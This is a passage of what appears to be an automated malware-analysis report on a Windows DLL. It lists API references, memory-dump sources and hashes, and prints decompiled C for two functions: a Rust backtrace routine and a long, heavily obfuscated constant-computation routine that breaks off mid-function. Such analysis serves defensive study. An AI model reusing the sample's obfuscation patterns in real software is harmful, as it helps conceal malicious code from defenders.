                          0x6ecdda91
                          0x6ecdda91
                          0x6ecdda93
                          0x6ecddaed
                          0x6ecddaf0
                          0x6ecddaf2
                          0x6ecddaf5
                          0x6ecdda95
                          0x6ecdda98
                          0x6ecdda9b
                          0x6ecddaa1
                          0x6ecddaa8
                          0x6ecddab0
                          0x6ecddab3
                          0x6ecddab5
                          0x6ecddab8
                          0x6ecddabb
                          0x6ecddabe
                          0x6ecddac2
                          0x6ecddac4
                          0x6ecddac6
                          0x6ecddaca
                          0x6ecddacc
                          0x6ecddacc
                          0x6ecddad8
                          0x6ecddad8
                          0x6ecddae6
                          0x6ecddae6
                          0x6ecddaa1
                          0x6ecddaf8
                          0x6ecddaff
                          0x6ecddb10
                          0x6ecddb10
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6ecdd9e1
                          0x6ecdd9d7
                          0x6ecdd7de
                          0x6ecdd7de
                          0x6ecdd7e0
                          0x6ecdd7e2
                          0x6ecdd7e2
                          0x6ecdd7e6
                          0x00000000
                          0x00000000
                          0x6ecdd7e8
                          0x6ecdd7ed
                          0x00000000
                          0x6ecdd7ef
                          0x6ecdd7ef
                          0x6ecdd7f4
                          0x00000000
                          0x6ecdd7f6
                          0x6ecdd7f6
                          0x6ecdd7fb
                          0x00000000
                          0x6ecdd7fd
                          0x6ecdd7fd
                          0x6ecdd802
                          0x00000000
                          0x6ecdd804
                          0x6ecdd804
                          0x6ecdd809
                          0x00000000
                          0x6ecdd80b
                          0x6ecdd80b
                          0x6ecdd810
                          0x00000000
                          0x6ecdd812
                          0x6ecdd812
                          0x6ecdd817
                          0x00000000
                          0x6ecdd819
                          0x6ecdd819
                          0x6ecdd81c
                          0x6ecdd81f
                          0x6ecdd822
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6ecdd822
                          0x6ecdd817
                          0x6ecdd810
                          0x6ecdd809
                          0x6ecdd802
                          0x6ecdd7fb
                          0x6ecdd7f4
                          0x00000000
                          0x6ecdd7ed
                          0x6ecdd844
                          0x6ecdd844
                          0x6ecdd847
                          0x6ecdd84e
                          0x6ecdd855
                          0x6ecdd857
                          0x6ecdd859
                          0x6ecdd85b
                          0x6ecdd85d
                          0x6ecdd863
                          0x6ecdd86e
                          0x6ecdd86e
                          0x6ecdd863
                          0x6ecdd85b
                          0x6ecdd873
                          0x6ecdd877
                          0x6ecdd87d
                          0x6ecdd882
                          0x6ecdd885
                          0x6ecdd888
                          0x6ecdd890
                          0x6ecdd892
                          0x6ecdd895
                          0x6ecdd898
                          0x6ecdd89b
                          0x6ecdd89f
                          0x6ecdd8a1
                          0x6ecdd8a3
                          0x6ecdd8a7
                          0x6ecdd8a9
                          0x6ecdd8a9
                          0x6ecdd8b5
                          0x6ecdd8ba
                          0x6ecdd8ba
                          0x6ecdd8c6
                          0x6ecdd8c6
                          0x6ecdda09
                          0x6ecdda0c
                          0x6ecdda12
                          0x6ecdda12
                          0x6ecdda15
                          0x6ecdda25
                          0x6ecdda25
                          0x00000000
                          0x6ecdd7dc
                          0x6ecdd5ed
                          0x6ecdd56c
                          0x6ecdd56c
                          0x6ecdd573
                          0x6ecddb1a
                          0x6ecddb1f
                          0x6ecddb24
                          0x6ecddb29
                          0x6ecddb2b
                          0x6ecddb32
                          0x6ecddb3a
                          0x6ecddb44
                          0x6ecddb4f
                          0x6ecddb5f
                          0x6ecdd579
                          0x6ecdd579
                          0x00000000
                          0x6ecdd579
                          0x6ecdd573
                          0x00000000

                          APIs
                          • GetProcessHeap.KERNEL32 ref: 6ECDD56C
                          • HeapAlloc.KERNEL32(011C0000,00000000,0000000A), ref: 6ECDD583
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID: RUST_BACKTRACE
                          • API String ID: 1617791916-3454309823
                          • Opcode ID: d9343a4f3e07f0cb55fae24e8956e918f32ded61acb9049216a55c8387fb4f8b
                          • Instruction ID: c01adb82c75ca93d703db10a44fd9257aba5bf5ba0561425789a24da622bb3bc
                          • Opcode Fuzzy Hash: d9343a4f3e07f0cb55fae24e8956e918f32ded61acb9049216a55c8387fb4f8b
                          • Instruction Fuzzy Hash: 2F029DB1E042198FDB10CFD8C890BDDBBB2BF49314F154259D629B7284E772A849CFA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECDE690, Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 135libraryloadersynchronizationCOMMON
                          Download Yara Rule
                          C-Code - Quality: 52%
                          			E6ECDE690(void* __ebx, void* __edi, void* __esi, char _a8) {
				int _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* __ebp;
				void* _t15;
				struct HINSTANCE__* _t20;
				signed int _t21;
				void* _t23;
				_Unknown_base(*)()* _t25;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t30;
				void* _t35;
				_Unknown_base(*)()* _t38;
				_Unknown_base(*)()* _t39;
				signed int _t50;
				_Unknown_base(*)()* _t52;
				void* _t59;

				_t48 = __edi;
				_push(__edi);
				_v32 = _t59 - 0x14;
				_v20 = 0xffffffff;
				_v24 = E6ECE3BA0;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t35 =  *0x6ed2adc4; // 0x0
				if(_t35 == 0) {
					_t15 = CreateMutexA(0, 0, "Local\\RustBacktraceMutex");
					__eflags = _t15;
					if(_t15 == 0) {
						_t54 = 1;
						goto L19;
					} else {
						_t35 = _t15;
						__eflags = 0;
						asm("lock cmpxchg [0x6ed2adc4], ebx");
						if(0 != 0) {
							CloseHandle(_t35);
							_t35 = 0;
						}
						goto L1;
					}
				} else {
					L1:
					WaitForSingleObjectEx(_t35, 0xffffffff, 0);
					_t20 =  *0x6ed2add0; // 0x0
					if(_t20 != 0) {
						L3:
						_t54 = 0;
						if( *0x6ed2ae04 != 0) {
							goto L19;
						} else {
							_t38 =  *0x6ed2add4; // 0x0
							if(_t38 != 0) {
								L7:
								_t21 =  *_t38();
								_t39 =  *0x6ed2add8; // 0x0
								_t50 = _t21;
								if(_t39 != 0) {
									L10:
									 *_t39(_t50 | 0x00000004);
									_t52 =  *0x6ed2addc; // 0x0
									if(_t52 != 0) {
										L13:
										_t23 = GetCurrentProcess();
										 *_t52(_t23, 0, 1);
										 *0x6ed2ae04 = 1;
										goto L19;
									} else {
										_t25 = GetProcAddress( *0x6ed2add0, "SymInitializeW");
										if(_t25 == 0) {
											_v36 = _t35;
											_v20 = 0;
											E6ECF6E20(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t52, _t54, __eflags, 0x6ed1dcac);
											goto L23;
										} else {
											_t52 = _t25;
											 *0x6ed2addc = _t25;
											goto L13;
										}
									}
								} else {
									_t28 = GetProcAddress( *0x6ed2add0, "SymSetOptions");
									if(_t28 == 0) {
										_v36 = _t35;
										_v20 = 0;
										E6ECF6E20(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t50, _t54, __eflags, 0x6ed1dc9c);
										goto L23;
									} else {
										_t39 = _t28;
										 *0x6ed2add8 = _t28;
										goto L10;
									}
								}
							} else {
								_t30 = GetProcAddress(_t20, "SymGetOptions");
								if(_t30 == 0) {
									_v36 = _t35;
									_v20 = 0;
									E6ECF6E20(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t48, 0, __eflags, 0x6ed1dc8c);
									L23:
									asm("ud2");
									__eflags =  &_a8;
									return E6ECDE880(_v36);
								} else {
									_t38 = _t30;
									 *0x6ed2add4 = _t30;
									goto L7;
								}
							}
						}
					} else {
						_t20 = LoadLibraryA("dbghelp.dll");
						 *0x6ed2add0 = _t20;
						if(_t20 == 0) {
							ReleaseMutex(_t35);
							_t54 = 1;
							L19:
							 *[fs:0x0] = _v28;
							return _t54;
						} else {
							goto L3;
						}
					}
				}
			}






















                          0x6ecde690
                          0x6ecde694
                          0x6ecde699
                          0x6ecde69c
                          0x6ecde6a3
                          0x6ecde6b4
                          0x6ecde6b7
                          0x6ecde6bd
                          0x6ecde6c5
                          0x6ecde7a5
                          0x6ecde7aa
                          0x6ecde7ac
                          0x6ecde7d0
                          0x00000000
                          0x6ecde7ae
                          0x6ecde7ae
                          0x6ecde7b0
                          0x6ecde7b2
                          0x6ecde7ba
                          0x6ecde7c3
                          0x6ecde7c9
                          0x6ecde7c9
                          0x00000000
                          0x6ecde7ba
                          0x6ecde6cb
                          0x6ecde6cb
                          0x6ecde6d0
                          0x6ecde6d5
                          0x6ecde6dc
                          0x6ecde6f5
                          0x6ecde6f5
                          0x6ecde6fe
                          0x00000000
                          0x6ecde704
                          0x6ecde704
                          0x6ecde70c
                          0x6ecde729
                          0x6ecde729
                          0x6ecde72b
                          0x6ecde731
                          0x6ecde735
                          0x6ecde757
                          0x6ecde75b
                          0x6ecde75d
                          0x6ecde765
                          0x6ecde787
                          0x6ecde787
                          0x6ecde791
                          0x6ecde793
                          0x00000000
                          0x6ecde767
                          0x6ecde772
                          0x6ecde77a
                          0x6ecde83d
                          0x6ecde840
                          0x6ecde856
                          0x00000000
                          0x6ecde780
                          0x6ecde780
                          0x6ecde782
                          0x00000000
                          0x6ecde782
                          0x6ecde77a
                          0x6ecde737
                          0x6ecde742
                          0x6ecde74a
                          0x6ecde81a
                          0x6ecde81d
                          0x6ecde833
                          0x00000000
                          0x6ecde750
                          0x6ecde750
                          0x6ecde752
                          0x00000000
                          0x6ecde752
                          0x6ecde74a
                          0x6ecde70e
                          0x6ecde714
                          0x6ecde71c
                          0x6ecde7f7
                          0x6ecde7fa
                          0x6ecde810
                          0x6ecde85e
                          0x6ecde85e
                          0x6ecde864
                          0x6ecde873
                          0x6ecde722
                          0x6ecde722
                          0x6ecde724
                          0x00000000
                          0x6ecde724
                          0x6ecde71c
                          0x6ecde70c
                          0x6ecde6de
                          0x6ecde6e3
                          0x6ecde6ea
                          0x6ecde6ef
                          0x6ecde7d8
                          0x6ecde7dd
                          0x6ecde7e2
                          0x6ecde7e7
                          0x6ecde7f6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6ecde6ef
                          0x6ecde6dc

                          APIs
                          • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6ECDE6D0
                          • LoadLibraryA.KERNEL32(dbghelp.dll,00000000,000000FF,00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6ECDE6E3
                          • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 6ECDE714
                          • GetProcAddress.KERNEL32(SymSetOptions), ref: 6ECDE742
                          • GetProcAddress.KERNEL32(SymInitializeW), ref: 6ECDE772
                          • GetCurrentProcess.KERNEL32 ref: 6ECDE787
                          • CreateMutexA.KERNEL32(00000000,00000000,Local\RustBacktraceMutex), ref: 6ECDE7A5
                          • CloseHandle.KERNEL32(00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6ECDE7C3
                            • Part of subcall function 6ECDE880: ReleaseMutex.KERNEL32(?,6ECDE5F8), ref: 6ECDE881
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressProc$Mutex$CloseCreateCurrentHandleLibraryLoadObjectProcessReleaseSingleWait
                          • String ID: Local\RustBacktraceMutex$SymGetOptions$SymInitializeW$SymSetOptions$called `Option::unwrap()` on a `None` value$dbghelp.dll
                          • API String ID: 1067696788-3213342004
                          • Opcode ID: 6cebd81d95a18661772f6932df0c52ebb649f1c234aa3c198c764a5dbf6aac3c
                          • Instruction ID: 7a9a714a8b04e17f362c45bcbc44dea06012d640b4e4fef9e4149da48459c0ac
                          • Opcode Fuzzy Hash: 6cebd81d95a18661772f6932df0c52ebb649f1c234aa3c198c764a5dbf6aac3c
                          • Instruction Fuzzy Hash: 71412672E04B419FEF509FE5DE5479AB7BAEB45315F010438E606A7384F736880AC7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0111EDED, Relevance: 25.7, Strings: 20, Instructions: 740COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 95%
                          			E0111EDED(intOrPtr __ecx) {
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				void* _t878;
				intOrPtr _t886;
				void* _t887;
				signed int _t889;
				void* _t899;
				void* _t904;
				void* _t912;
				void* _t916;
				void* _t917;
				void* _t925;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t938;
				signed int _t939;
				signed int _t940;
				signed int _t941;
				signed int _t942;
				signed int _t943;
				signed int _t944;
				signed int _t945;
				signed int _t946;
				signed int _t947;
				void* _t948;
				intOrPtr _t949;
				char _t960;
				void* _t967;
				void* _t974;
				void* _t1020;
				void* _t1041;
				signed int _t1044;
				intOrPtr _t1045;
				void* _t1049;
				signed int* _t1051;
				signed int* _t1054;
				void* _t1056;

				_t1051 =  &_v432;
				_v284 = 0x691c9d;
				_v284 = _v284 * 0x5e;
				_t1049 = 0;
				_v284 = _v284 | 0xffb50446;
				_t925 = 0x7579ad8;
				_v284 = _v284 ^ 0xb2ffc1ad;
				_v120 = 0x60d75f;
				_v120 = _v120 << 8;
				_v120 = _v120 ^ 0x60d75f01;
				_v220 = 0xc69f70;
				_v220 = _v220 + 0xf28e;
				_v72 = __ecx;
				_t930 = 0xb;
				_v220 = _v220 / _t930;
				_v220 = _v220 ^ 0x0012248b;
				_v156 = 0x64e6c0;
				_v156 = _v156 + 0x49b8;
				_v156 = _v156 ^ 0x00653078;
				_v232 = 0x498fe5;
				_v232 = _v232 ^ 0x88a6dd1c;
				_v232 = _v232 + 0xfffff4d2;
				_v232 = _v232 ^ 0x88ef47cb;
				_v424 = 0xf724cb;
				_v424 = _v424 << 5;
				_v424 = _v424 >> 0xe;
				_t931 = 0x30;
				_v424 = _v424 * 0x7f;
				_v424 = _v424 ^ 0x003d4d6e;
				_v180 = 0x462264;
				_v180 = _v180 ^ 0x6fcea306;
				_v180 = _v180 ^ 0x6f888162;
				_v340 = 0x2e6d4e;
				_v340 = _v340 + 0x41e3;
				_v340 = _v340 + 0x5d4e;
				_v340 = _v340 ^ 0x6cf19d7b;
				_v340 = _v340 ^ 0x6cde9104;
				_v84 = 0xc70918;
				_v84 = _v84 * 0x44;
				_v84 = _v84 ^ 0x34de6a60;
				_v236 = 0x3b3b1b;
				_v236 = _v236 >> 0xe;
				_v236 = _v236 | 0x4836df35;
				_v236 = _v236 ^ 0x4836dffd;
				_v396 = 0xd569f3;
				_v396 = _v396 / _t931;
				_v396 = _v396 * 0x5b;
				_v396 = _v396 | 0x85f0bc17;
				_v396 = _v396 ^ 0x85f4bcd7;
				_v296 = 0x1e21a2;
				_v296 = _v296 * 0x31;
				_v296 = _v296 + 0x8ec0;
				_v296 = _v296 ^ 0x37f0404c;
				_v296 = _v296 ^ 0x3234be8e;
				_v176 = 0xdad679;
				_v176 = _v176 >> 0xe;
				_v176 = _v176 ^ 0x0000034b;
				_v368 = 0x735672;
				_v368 = _v368 | 0x3953310b;
				_v368 = _v368 << 5;
				_v368 = _v368 + 0x74f2;
				_v368 = _v368 ^ 0x2e63acc9;
				_v376 = 0xd1bddc;
				_v376 = _v376 + 0xce36;
				_v376 = _v376 | 0xb461c001;
				_v376 = _v376 >> 9;
				_v376 = _v376 ^ 0x0052086c;
				_v384 = 0xd19a5e;
				_t932 = 0x65;
				_v384 = _v384 / _t932;
				_v384 = _v384 | 0x726ef163;
				_v384 = _v384 + 0x9b53;
				_v384 = _v384 ^ 0x726dc7da;
				_v344 = 0xb29a03;
				_v344 = _v344 | 0x13511d04;
				_v344 = _v344 ^ 0x49acd7d1;
				_v344 = _v344 ^ 0xce5df15e;
				_v344 = _v344 ^ 0x9404b0e6;
				_v352 = 0x13b316;
				_v352 = _v352 | 0x6a2836e7;
				_v352 = _v352 + 0xffff0e65;
				_t933 = 0x3b;
				_v352 = _v352 / _t933;
				_v352 = _v352 ^ 0x01cb148f;
				_v360 = 0xcdb7f9;
				_t934 = 0x12;
				_v360 = _v360 / _t934;
				_v360 = _v360 + 0xd58f;
				_v360 = _v360 + 0xffff34a6;
				_v360 = _v360 ^ 0x000d394e;
				_v240 = 0x194d0a;
				_v240 = _v240 >> 5;
				_v240 = _v240 + 0xb037;
				_v240 = _v240 ^ 0x000181f4;
				_v336 = 0x90831a;
				_v336 = _v336 << 0xe;
				_v336 = _v336 | 0x73ebb7fd;
				_t1044 = 0x70;
				_v336 = _v336 * 0x28;
				_v336 = _v336 ^ 0x1d702c5c;
				_v164 = 0xd3cfdc;
				_v164 = _v164 + 0xf919;
				_v164 = _v164 ^ 0x00dcbb26;
				_v140 = 0xc70031;
				_v140 = _v140 / _t1044;
				_v140 = _v140 ^ 0x0002a430;
				_v224 = 0x4edd87;
				_v224 = _v224 << 9;
				_v224 = _v224 | 0xd4b44389;
				_v224 = _v224 ^ 0xddb78ea5;
				_v148 = 0x17582b;
				_v148 = _v148 << 3;
				_v148 = _v148 ^ 0x00bedc16;
				_v328 = 0xa02eea;
				_v328 = _v328 * 0x12;
				_v328 = _v328 + 0xffff4f3f;
				_v328 = _v328 * 0x72;
				_v328 = _v328 ^ 0x03a87b0f;
				_v312 = 0x65f311;
				_v312 = _v312 + 0xffffeb5b;
				_v312 = _v312 ^ 0x17ca191f;
				_v312 = _v312 << 1;
				_v312 = _v312 ^ 0x2f5e2391;
				_v216 = 0xcaaed7;
				_v216 = _v216 | 0xdfbffed2;
				_v216 = _v216 ^ 0xdff04099;
				_v320 = 0xe429a2;
				_v320 = _v320 << 7;
				_v320 = _v320 ^ 0x64d927e8;
				_v320 = _v320 >> 1;
				_v320 = _v320 ^ 0x0b6be30d;
				_v132 = 0xb8ca75;
				_v132 = _v132 | 0x13aee0cc;
				_v132 = _v132 ^ 0x13b0dc0a;
				_v364 = 0x6e0227;
				_v364 = _v364 | 0x4b6775d3;
				_v364 = _v364 + 0xffffa7b6;
				_v364 = _v364 | 0x5adace0b;
				_v364 = _v364 ^ 0x5bf85b33;
				_v332 = 0x1ea957;
				_v332 = _v332 ^ 0x7bdcea1f;
				_v332 = _v332 + 0xffff931b;
				_v332 = _v332 + 0xfe21;
				_v332 = _v332 ^ 0x7bce67a5;
				_v196 = 0x2eb620;
				_v196 = _v196 ^ 0x1a084885;
				_t935 = 0x1b;
				_v196 = _v196 / _t935;
				_v196 = _v196 ^ 0x00f7257a;
				_v432 = 0x3a3e0a;
				_v432 = _v432 ^ 0xc1716f80;
				_v432 = _v432 | 0x98ff88e4;
				_v432 = _v432 << 6;
				_v432 = _v432 ^ 0x7ff8035f;
				_v252 = 0xae10e8;
				_v252 = _v252 + 0xffff291c;
				_v252 = _v252 << 0xc;
				_v252 = _v252 ^ 0xd3ad17fd;
				_v136 = 0xd14910;
				_v136 = _v136 >> 0xd;
				_v136 = _v136 ^ 0x000de50a;
				_v88 = 0xff11ba;
				_v88 = _v88 >> 0xe;
				_v88 = _v88 ^ 0x000cd76b;
				_v128 = 0xa92711;
				_v128 = _v128 ^ 0x556d13f3;
				_v128 = _v128 ^ 0x55c869df;
				_v96 = 0xd5b7ad;
				_v96 = _v96 | 0xc1cec025;
				_v96 = _v96 ^ 0xc1d1ee17;
				_v280 = 0x43f750;
				_v280 = _v280 + 0x2f6f;
				_v280 = _v280 | 0x22c29e26;
				_v280 = _v280 ^ 0x22c71f58;
				_v416 = 0x708958;
				_v416 = _v416 << 4;
				_t936 = 0x53;
				_v416 = _v416 * 0x55;
				_v416 = _v416 + 0x11ea;
				_v416 = _v416 ^ 0x55d2e849;
				_v288 = 0x2ccf8a;
				_v288 = _v288 ^ 0x2706f9e9;
				_v288 = _v288 >> 8;
				_v288 = _v288 ^ 0x002901bb;
				_v204 = 0x817792;
				_v204 = _v204 ^ 0xc81ce5e5;
				_v204 = _v204 >> 9;
				_v204 = _v204 ^ 0x00683104;
				_v292 = 0x369e72;
				_v292 = _v292 + 0xffff59c5;
				_v292 = _v292 + 0x9529;
				_v292 = _v292 ^ 0x0039ecd6;
				_v184 = 0x4cc20f;
				_v184 = _v184 >> 4;
				_v184 = _v184 ^ 0x000bd2f2;
				_v400 = 0x96d482;
				_v400 = _v400 / _t936;
				_v400 = _v400 ^ 0xfb214b85;
				_v400 = _v400 + 0xffff7dca;
				_v400 = _v400 ^ 0xfb2aaa3a;
				_v408 = 0xe3681d;
				_v408 = _v408 >> 2;
				_v408 = _v408 ^ 0x060a0f11;
				_v408 = _v408 + 0x10b8;
				_v408 = _v408 ^ 0x0636c909;
				_v272 = 0x590664;
				_v272 = _v272 >> 4;
				_v272 = _v272 + 0x26f3;
				_v272 = _v272 ^ 0x0003d4a2;
				_v172 = 0xf18346;
				_v172 = _v172 ^ 0x71ddc0cf;
				_v172 = _v172 ^ 0x7121affc;
				_v248 = 0xe1c8c4;
				_v248 = _v248 | 0xf2ad841b;
				_v248 = _v248 + 0xffff447a;
				_v248 = _v248 ^ 0xf2e9460c;
				_v256 = 0x519e10;
				_v256 = _v256 | 0xdc8a6104;
				_v256 = _v256 + 0x5077;
				_v256 = _v256 ^ 0xdcd61490;
				_v392 = 0x4daef6;
				_v392 = _v392 + 0x5b70;
				_v392 = _v392 | 0x7bfd6fbf;
				_v392 = _v392 ^ 0x7bfd4f8a;
				_v264 = 0xa63eff;
				_v264 = _v264 >> 8;
				_v264 = _v264 + 0xffffadc4;
				_v264 = _v264 ^ 0x000453cd;
				_v160 = 0x17d409;
				_v160 = _v160 ^ 0x9fb8b55e;
				_v160 = _v160 ^ 0x9fa0b21c;
				_v212 = 0x6a1a8d;
				_v212 = _v212 >> 3;
				_v212 = _v212 << 0xa;
				_v212 = _v212 ^ 0x35094e45;
				_v112 = 0xa556a;
				_v112 = _v112 >> 5;
				_v112 = _v112 ^ 0x000cc68a;
				_v144 = 0xab50d0;
				_v144 = _v144 ^ 0xa6f75ca8;
				_v144 = _v144 ^ 0xa6598527;
				_v104 = 0xd81749;
				_v104 = _v104 + 0xffff8ca8;
				_v104 = _v104 ^ 0x00db48a0;
				_v268 = 0x33dbc3;
				_t937 = 0x76;
				_v268 = _v268 / _t937;
				_v268 = _v268 + 0xffff5dd8;
				_v268 = _v268 ^ 0xfff17317;
				_v152 = 0x42cbe3;
				_v152 = _v152 ^ 0xa4a52bdf;
				_v152 = _v152 ^ 0xa4e6915d;
				_v380 = 0x65d97d;
				_t938 = 0x21;
				_v380 = _v380 / _t938;
				_t939 = 0x5c;
				_v380 = _v380 / _t939;
				_v380 = _v380 >> 0x10;
				_v380 = _v380 ^ 0x0007411d;
				_v92 = 0xa9d4cf;
				_v92 = _v92 >> 2;
				_v92 = _v92 ^ 0x00290723;
				_v372 = 0xfeac8f;
				_v372 = _v372 + 0xffff000e;
				_v372 = _v372 | 0x784e09d1;
				_v372 = _v372 + 0x9e81;
				_v372 = _v372 ^ 0x790729d3;
				_v260 = 0xdb5b23;
				_v260 = _v260 ^ 0x99ef16de;
				_v260 = _v260 << 0xf;
				_v260 = _v260 ^ 0x26f8d6b6;
				_v316 = 0x9225c5;
				_t940 = 0x1d;
				_v316 = _v316 / _t940;
				_v316 = _v316 << 5;
				_v316 = _v316 << 6;
				_v316 = _v316 ^ 0x285c3ab4;
				_v228 = 0x4a87a9;
				_v228 = _v228 + 0x4174;
				_t941 = 0x15;
				_v228 = _v228 / _t941;
				_v228 = _v228 ^ 0x000ad4c3;
				_v200 = 0xe017a4;
				_v200 = _v200 | 0xfffd7bff;
				_v200 = _v200 ^ 0xfffcfad2;
				_v208 = 0x2755d6;
				_v208 = _v208 + 0xfffffacf;
				_v208 = _v208 | 0x40526ffd;
				_v208 = _v208 ^ 0x407e6bc8;
				_v116 = 0x3ae65f;
				_v116 = _v116 >> 6;
				_v116 = _v116 ^ 0x00032ad5;
				_v124 = 0x5f3d3a;
				_t942 = 0x6b;
				_v124 = _v124 / _t942;
				_v124 = _v124 ^ 0x000bf430;
				_v100 = 0xf35212;
				_v100 = _v100 >> 6;
				_v100 = _v100 ^ 0x0009c0a2;
				_v420 = 0x2eebab;
				_v420 = _v420 | 0xf6d0a7fd;
				_v420 = _v420 >> 1;
				_v420 = _v420 ^ 0x7b7d0167;
				_v300 = 0xce7509;
				_t943 = 0x69;
				_v300 = _v300 / _t943;
				_v300 = _v300 | 0x5075b092;
				_v300 = _v300 + 0x8361;
				_v300 = _v300 ^ 0x507a9538;
				_v348 = 0x191358;
				_t944 = 0xe;
				_v348 = _v348 * 0x1b;
				_v348 = _v348 | 0x0485a05c;
				_v348 = _v348 + 0xffff2600;
				_v348 = _v348 ^ 0x06a47f76;
				_v404 = 0x701fe6;
				_v404 = _v404 + 0x79e5;
				_v404 = _v404 * 0x58;
				_v404 = _v404 | 0xeb10b4f0;
				_v404 = _v404 ^ 0xefbedf20;
				_v324 = 0xb4b034;
				_v324 = _v324 + 0xffffd260;
				_v324 = _v324 / _t944;
				_v324 = _v324 + 0xffffaad8;
				_v324 = _v324 ^ 0x0006f697;
				_v412 = 0x7aa07a;
				_v412 = _v412 + 0xffffcfc6;
				_v412 = _v412 | 0x249cdff4;
				_v412 = _v412 << 7;
				_t1041 = 0xe1e175e;
				_v412 = _v412 ^ 0x7f772289;
				_v188 = 0x87f348;
				_v188 = _v188 >> 7;
				_v188 = _v188 ^ 0x00047130;
				_v356 = 0x8a7190;
				_v356 = _v356 ^ 0x27d021b4;
				_t945 = 0x16;
				_v356 = _v356 / _t945;
				_v356 = _v356 + 0xffff1eb0;
				_v356 = _v356 ^ 0x01cefa44;
				_v388 = 0xbb3fb6;
				_v388 = _v388 + 0xffff20d9;
				_v388 = _v388 << 9;
				_t946 = 0x14;
				_push("true");
				_v388 = _v388 * 0x54;
				_v388 = _v388 ^ 0x4f556c94;
				_v308 = 0x1c0b60;
				_v308 = _v308 * 0x7b;
				_v308 = _v308 + 0xffff32c8;
				_v308 = _v308 + 0x24e1;
				_v308 = _v308 ^ 0x0d722f97;
				_v276 = 0x6570cb;
				_v276 = _v276 + 0xffff7c4e;
				_v276 = _v276 >> 0xc;
				_v276 = _v276 ^ 0x00020c1a;
				_v168 = 0x110360;
				_v168 = _v168 >> 6;
				_v168 = _v168 ^ 0x0007d325;
				_v244 = 0x49b385;
				_v244 = _v244 / _t946;
				_v244 = _v244 / _t1044;
				_v244 = _v244 ^ 0x00088ad2;
				_v428 = 0xb594c6;
				_v428 = _v428 + 0xffffd599;
				_v428 = _v428 + 0x6abc;
				_pop(_t947);
				_v428 = _v428 / _t947;
				_v428 = _v428 ^ 0x000ab197;
				_v108 = 0xf33703;
				_v108 = _v108 ^ 0x76fb8a75;
				_v108 = _v108 ^ 0x760024cb;
				_v192 = 0x55d6d7;
				_v192 = _v192 >> 6;
				_v192 = _v192 | 0x1d096e60;
				_v192 = _v192 ^ 0x1d02387d;
				_v304 = 0xaa81cc;
				_v304 = _v304 * 0x1f;
				_v304 = _v304 << 0xe;
